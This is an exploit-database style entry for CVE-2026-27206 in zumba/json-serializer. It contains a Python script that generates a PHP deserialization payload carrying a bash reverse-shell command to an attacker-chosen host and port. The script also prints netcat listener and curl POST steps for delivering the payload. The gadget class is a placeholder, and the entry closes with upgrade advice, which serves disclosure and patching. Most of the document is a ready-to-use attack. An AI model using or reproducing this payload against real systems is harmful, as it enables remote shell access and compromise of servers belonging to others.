zumba/json-serializer < 3.2.3 RCE (CVE-2026-27206)

2026.03.15
Risk: High
Local: No
Remote: Yes
CWE: CWE-502

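#!/usr/bin/env python3
# Exploit Title: zumba/json-serializer < 3.2.3 RCE
# CVE: CVE-2026-27206
# Date: 2026-02-24
# Exploit Author: Mohammed Idrees Banyamer
# Author Country: Jordan
# Instagram: @banyamer_security
# Author GitHub:
# Vendor Homepage: https://github.com/zumba/json-serializer
# Software Link: https://github.com/zumba/json-serializer
# Affected: zumba/json-serializer < 3.2.3
# Tested on: PHP 8.1 / 8.2
# Category: Remote Code Execution
# Platform: PHP
# Exploit Type: Remote
# CVSS: 8.1 (HIGH)
# CWE: CWE-502 (Deserialization of Untrusted Data)
# Description: Unrestricted PHP object instantiation via @type in
#   JsonSerializer::unserialize(), allowing arbitrary class creation and
#   potential code execution via magic methods / gadget chains
# Fixed in: 3.2.3
# Usage: python3 exploit.py <target_url> --lhost <your_ip> --lport <your_port>
#
# Examples:
#   python3 exploit.py http://example.com/api/unserialize --lhost 192.168.1.100 --lport 4444
#
# Notes:
#   • This script generates and shows a malicious payload; it sends nothing.
#   • Actual exploitation requires:
#       1. An endpoint that accepts JSON and passes it directly to
#          JsonSerializer::unserialize()
#       2. A usable POP gadget chain present in the target application or
#          its dependencies
#   • Without a gadget chain this only demonstrates object injection (no RCE).
#
"""Payload generator for CVE-2026-27206 (zumba/json-serializer < 3.2.3).

The vulnerable ``JsonSerializer::unserialize()`` instantiates whatever class
is named by the ``@type`` key of the incoming JSON (see the description in
the header), so the attacker chooses which PHP class gets created.  Whether
that becomes code execution depends entirely on a gadget (magic-method)
chain present in the target; ``RCEGadget`` below is a placeholder, not a
real class.  This script only builds and prints the JSON document — it
never contacts the target.
"""

import argparse
import json
import re
import sys

# Banner shown once when the script is run directly (not on import).  Raw
# string: the ASCII art contains backslashes that are not valid escapes.
BANNER = r"""
 ____ _____ ___ _ _ ___ ___ ___
/ ___| | ____| / _ \ | | | | / _ \ / _ \ / _ \
| | | _| | | | | | |_| | | | | | | | | | | |
| |___ | |___ | |_| | | _ | | |_| | |_| | |_| |
 \____| |_____| \___/ |_| |_| \___/ \___/ \___/

CVE-2026-27206 – Proof of Concept
────────────────────────────────────
Author : Mohammed Idrees Banyamer
Country : Jordan
Instagram : @banyamer_security
Date : 2026-02-24
"""

# Placeholder class name carried in "@type".  It is deliberately NOT a real
# gadget: substitute a class that is loadable in the target application and
# whose magic methods (__wakeup/__destruct/__toString/...) reach something
# dangerous.  What the library does with an unknown class name is not shown
# here — confirm against the target's version.
DEFAULT_GADGET_CLASS = "RCEGadget"
# Property name the placeholder gadget is assumed to read its command from.
DEFAULT_CMD_KEY = "cmd"

# Hostnames, IPv4 and IPv6 literals only.  lhost is interpolated into a shell
# command below, so whitespace, quotes or shell metacharacters would only
# corrupt the generated payload — reject them up front.
_HOST_RE = re.compile(r"[A-Za-z0-9._:-]+")


def _validate_port(lport):
    """Return ``lport`` as an int in 1..65535, or raise ``ValueError``."""
    try:
        port = int(lport)
    except (TypeError, ValueError):
        raise ValueError(f"invalid port: {lport!r}") from None
    if not 1 <= port <= 65535:
        raise ValueError(f"port out of range 1-65535: {port}")
    return port


def _validate_host(lhost):
    """Return ``lhost`` unchanged if it is a plausible host, else raise ``ValueError``."""
    if not isinstance(lhost, str) or not _HOST_RE.fullmatch(lhost):
        raise ValueError(f"invalid listener host: {lhost!r}")
    return lhost


def generate_payload(lhost, lport, gadget_class=DEFAULT_GADGET_CLASS, cmd_key=DEFAULT_CMD_KEY):
    """Build the JSON document to POST at a vulnerable unserialize() endpoint.

    Args:
        lhost: Host or IP the reverse shell connects back to.
        lport: Listener port (str or int, 1-65535).
        gadget_class: Class name placed in ``@type``; the vulnerable
            deserializer instantiates this class.  Defaults to the
            ``RCEGadget`` placeholder — replace it with a real gadget.
        cmd_key: Property name the command is stored under.

    Returns:
        Compact JSON string (no whitespace) with ``@type`` as the first key.

    Raises:
        ValueError: if ``lhost`` or ``lport`` would not form a valid command.
    """
    lhost = _validate_host(lhost)
    lport = _validate_port(lport)

    # Example reverse shell command (modify for your target OS / needs).
    revshell_cmd = f"bash -c \"bash -i >& /dev/tcp/{lhost}/{lport} 0>&1\""

    # This is a DEMONSTRATION payload.  In real attacks you need a valid gadget
    # chain (Monolog, Symfony, Laravel, etc.): "@type" only selects the class
    # that gets instantiated.  The remaining keys are presumably applied as
    # properties of that object (the original author relies on this) — confirm
    # against the library; they are harmless unless a magic method acts on them.
    payload = {
        "@type": gadget_class,
        cmd_key: revshell_cmd,
    }
    return json.dumps(payload, separators=(",", ":"))


def _port_arg(value):
    """argparse ``type=`` hook: reject non-numeric or out-of-range ports early."""
    try:
        return _validate_port(value)
    except ValueError as exc:
        raise argparse.ArgumentTypeError(str(exc)) from None


def _host_arg(value):
    """argparse ``type=`` hook for --lhost (see ``_HOST_RE``)."""
    try:
        return _validate_host(value)
    except ValueError as exc:
        raise argparse.ArgumentTypeError(str(exc)) from None


def main():
    """Parse the command line, print the payload and the manual steps to use it."""
    parser = argparse.ArgumentParser(
        description="CVE-2026-27206 Proof of Concept - Payload Generator"
    )
    parser.add_argument("target", help="Target URL that accepts JSON input (for display only)")
    parser.add_argument("--lhost", required=True, type=_host_arg, help="Your IP address for reverse shell")
    parser.add_argument("--lport", required=True, type=_port_arg, help="Port to listen on")
    args = parser.parse_args()

    print(f"[*] Target URL (info only): {args.target}")
    print(f"[*] Listener: {args.lhost}:{args.lport}")
    print()

    malicious_json = generate_payload(args.lhost, args.lport)

    rule = "──────────────────────────────────────────────────────────────────────────────"
    print("[+] Generated malicious JSON payload:")
    print(rule)
    print(malicious_json)
    print(rule)
    print()

    print("[!] How to use this payload:")
    print(" 1. Start a listener: nc -lvnp", args.lport)
    print(" 2. POST the JSON above to an endpoint that uses JsonSerializer::unserialize()")
    print(" Example (curl):")
    print(f" curl -X POST {args.target} \\")
    print(" -H 'Content-Type: application/json' \\")
    # Single-quote the body for a POSIX shell; any embedded ' becomes '\''.
    print(" -d '" + malicious_json.replace("'", "'\\''") + "'")
    print()

    print("[!] Important:")
    print(" This payload only works if the application:")
    print(" • Uses vulnerable zumba/json-serializer (< 3.2.3)")
    print(" • Does NOT call setAllowedClasses()")
    print(" • Contains a POP chain that triggers code execution from the crafted object")
    print()
    print(" Without a gadget chain → only object injection (no RCE)")
    print(" Upgrade to >= 3.2.3 and use setAllowedClasses([]) or a whitelist")


if __name__ == "__main__":
    print(BANNER)
    # argparse would also reject a bare invocation, but keep the short
    # message the original printed before the usage dump.
    if len(sys.argv) == 1:
        print("Error: Missing arguments. Use --help for usage.\n")
        sys.exit(1)
    main()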

